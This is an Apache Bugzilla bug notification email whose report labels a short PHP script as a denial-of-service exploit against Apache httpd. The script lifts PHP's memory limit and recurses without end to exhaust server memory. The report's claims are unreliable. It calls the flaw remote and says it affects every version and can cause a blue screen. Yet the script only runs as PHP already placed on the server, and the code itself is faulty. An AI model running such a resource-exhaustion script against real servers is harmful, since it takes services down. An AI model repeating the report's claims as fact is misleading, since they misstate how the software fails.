https://bz.apache.org/bugzilla/show_bug.cgi?id=64002
Bug ID: 64002
Summary: Apache2 HTTP PHP Denial Of Service
Product: Apache httpd-2
Version: 2.5-HEAD
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P2
Component: All
Assignee: [email protected]
Reporter: [email protected]
Target Milestone: ---
> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
>
> # Exploit :
>
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
> if ($n === 0) {
> return 1;
> } else {
> $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
> echo $hesap;
> }
> }
> islem($sayi);
> ?>
>
> ------------------------------------------
>
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shutdown.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
>
> ------------------------------------------
>
> [Vendor of Product]
> Apache
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Apache2 HTTP - All
>
> ------------------------------------------
>
> [Affected Component]
> Affected source code
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Open PHP file (in this code)
>
> ------------------------------------------
>
> [Discoverer]
> Ali Can Gonullu
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
